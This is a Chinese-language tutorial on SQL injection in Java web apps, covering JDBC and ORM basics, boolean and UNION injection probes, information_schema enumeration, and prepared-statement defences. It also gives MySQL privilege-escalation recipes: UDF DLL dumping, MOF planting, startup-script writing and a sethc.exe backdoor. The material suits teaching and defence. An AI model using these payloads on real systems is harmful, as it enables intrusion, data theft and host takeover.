Java Web应用SQL注入攻击与防御详解<\/h1>

0x00 JDBC和ORM基础概念<\/h2>

核心组件<\/h3>

JDBC<\/strong>：Java数据库连接API，为多种关系数据库提供统一访问<\/li>
JPA<\/strong>：Java持久化API，通过注解或XML描述对象-关系表映射<\/li>

ORM<\/strong>：对象关系映射实现，包括：

Hibernate<\/li>
MyBatis<\/li>
OpenJPA<\/li>
TopLink<\/li>
EclipseJPA<\/li> <\/ul> <\/li> <\/ul>
数据库类型<\/h3>

关系型数据库<\/strong>：MySQL、Oracle、SQL Server等<\/li>
非关系型数据库(NoSQL)<\/strong>：

MongoDB(端口27017\/28017)<\/li>
CouchDB(5984)<\/li>
HBase(9000)<\/li>
Cassandra(9160)<\/li>
Neo4j(7474)<\/li>
Riak(8098)<\/li> <\/ul> <\/li> <\/ul>
0x01 JDBC中的SQL注入<\/h2>
典型注入示例<\/h3>
String sql =<\/span> "SELECT * from corps where id = "<\/span>+<\/span>id;<\/span> \/\/ 直接拼接SQL导致注入 <\/span><\/span><\/span><\/code><\/pre>注入测试案例<\/h3> 正常查询：id=2<\/code><\/li> 布尔测试： id=2 and 1=1<\/code> (返回结果)<\/li> id=2 and 1=2<\/code> (无结果)<\/li> <\/ul> <\/li> 字段数探测：order by 4<\/code> (成功) vs order by 5<\/code> (失败)<\/li> 联合查询：2 and 1=2 union select version(),user(),database(),5<\/code><\/li> <\/ol> 防御方案：预编译<\/h3> String sql =<\/span> "SELECT * from corps where id = ?"<\/span>;<\/span> <\/span><\/span>PreparedStatement pstt =<\/span> conn.<\/span>prepareStatement<\/span>(<\/span>sql);<\/span> <\/span><\/span>pstt.<\/span>setObject<\/span>(<\/span>1<\/span>,<\/span> id);<\/span> <\/span><\/span><\/code><\/pre>0x02 Web平台SQL注入实战<\/h2> MySQL信息收集技术<\/h3> information_schema利用<\/strong>：<\/p> -- 查找包含user关键字的表 <\/span><\/span><\/span><\/span>SELECT<\/span> TABLE_NAME<\/span> FROM<\/span> information_schema.TABLES <\/span><\/span>WHERE<\/span> TABLE_NAME<\/span> LIKE<\/span> '%user%'<\/span> AND<\/span> TABLE_SCHEMA =<\/span> database<\/span>(); <\/span><\/span> <\/span><\/span>-- 查找包含user关键字的列 <\/span><\/span><\/span><\/span>SELECT<\/span> TABLE_SCHEMA, TABLE_NAME<\/span>, COLUMN_NAME<\/span> <\/span><\/span>FROM<\/span> information_schema.COLUMNS WHERE<\/span> COLUMN_NAME<\/span> LIKE<\/span> '%user%'<\/span>; <\/span><\/span><\/code><\/pre><\/li> 数据导出技术<\/strong>：<\/p> 使用CONCAT<\/code>和GROUP_CONCAT<\/code>显示数据<\/li> 使用INTO OUTFILE<\/code>导出数据： SELECT<\/span> *<\/span> FROM<\/span> corps INTO<\/span> OUTFILE '\/path\/to\/file.txt'<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> MySQL提权技术<\/h3> 写启动项<\/strong>：<\/p> SELECT<\/span> 0<\/span>x6E6574... INTO<\/span> OUTFILE 'C:\/启动目录\/1.bat'<\/span> <\/span><\/span><\/code><\/pre><\/li> UDF提权<\/strong>：<\/p> 查找插件目录：SELECT @@plugin_dir<\/code><\/li> 导出DLL： SELECT<\/span> CONVERT<\/span>(0<\/span>x4D5A..., BINARY) INTO<\/span> DUMPFILE '\/plugin_dir\/udf.dll'<\/span> <\/span><\/span><\/code><\/pre><\/li> 创建函数(需命令行执行)： CREATE<\/span> FUNCTION<\/span> sys_exec RETURNS<\/span> STRING SONAME 'udf.dll'<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> MOF提权<\/strong>：<\/p> SELECT<\/span> CHAR(...) INTO<\/span> DUMPFILE 'c:\/windows\/system32\/wbem\/mof\/nullevts.mof'<\/span> <\/span><\/span><\/code><\/pre><\/li> sethc替换<\/strong>：<\/p> CREATE<\/span> TABLE<\/span> mix_cmd(cmd LONGBLOB); <\/span><\/span>INSERT<\/span> INTO<\/span> mix_cmd VALUES<\/span>(LOAD_FILE('c:\/windows\/system32\/cmd.exe'<\/span>)); <\/span><\/span>SELECT<\/span> *<\/span> FROM<\/span> mix_cmd INTO<\/span> DUMPFILE 'c:\/windows\/system32\/sethc.exe'<\/span>; <\/span><\/span><\/code><\/pre><\/li> <\/ol> 0x03 防御最佳实践<\/h2> 安全编码<\/h3> 始终使用预编译<\/strong>：<\/p> String sql =<\/span> "SELECT * FROM users WHERE username = ?"<\/span>;<\/span> <\/span><\/span>PreparedStatement stmt =<\/span> conn.<\/span>prepareStatement<\/span>(<\/span>sql);<\/span> <\/span><\/span>stmt.<\/span>setString<\/span>(<\/span>1<\/span>,<\/span> username);<\/span> <\/span><\/span><\/code><\/pre><\/li> 输入验证<\/strong>：<\/p> \/\/ 对于数字型参数 <\/span><\/span><\/span><\/span>int<\/span> id =<\/span> Integer.<\/span>parseInt<\/span>(<\/span>request.<\/span>getParameter<\/span>(<\/span>"id"<\/span>));<\/span> <\/span><\/span><\/code><\/pre><\/li> 安全查询构建<\/strong>：<\/p> \/\/ 使用条件构建器安全拼接SQL <\/span><\/span><\/span><\/span>StringBuilder sql =<\/span> new<\/span> StringBuilder(<\/span>"SELECT * FROM table WHERE 1=1"<\/span>);<\/span> <\/span><\/span>List<<\/span>Object><\/span> params =<\/span> new<\/span> ArrayList<>();<\/span> <\/span><\/span> <\/span><\/span>if<\/span>(<\/span>condition)<\/span> {<\/span> <\/span><\/span> sql.<\/span>append<\/span>(<\/span>" AND column = ?"<\/span>);<\/span> <\/span><\/span> params.<\/span>add<\/span>(<\/span>value);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 防御进阶<\/h3> 最小权限原则<\/strong>：数据库账户仅授予必要权限<\/li> 错误处理<\/strong>：避免显示详细错误信息<\/li> WAF部署<\/strong>：作为纵深防御的一部分<\/li> ORM安全使用<\/strong>：即使使用Hibernate\/MyBatis也要注意避免原生SQL拼接<\/li> <\/ol> 附录：常见易受攻击点<\/h2> 文章\/分类展示页面<\/li> 用户注册\/登录处<\/li> 搜索功能<\/li> 数据统计\/报表<\/li> 下拉选择框<\/li> 密码找回功能<\/li> 复杂业务逻辑处<\/li> <\/ol> 通过深入理解这些攻击技术和防御措施，开发者可以构建更安全的Java Web应用，有效防范SQL注入风险。<\/p>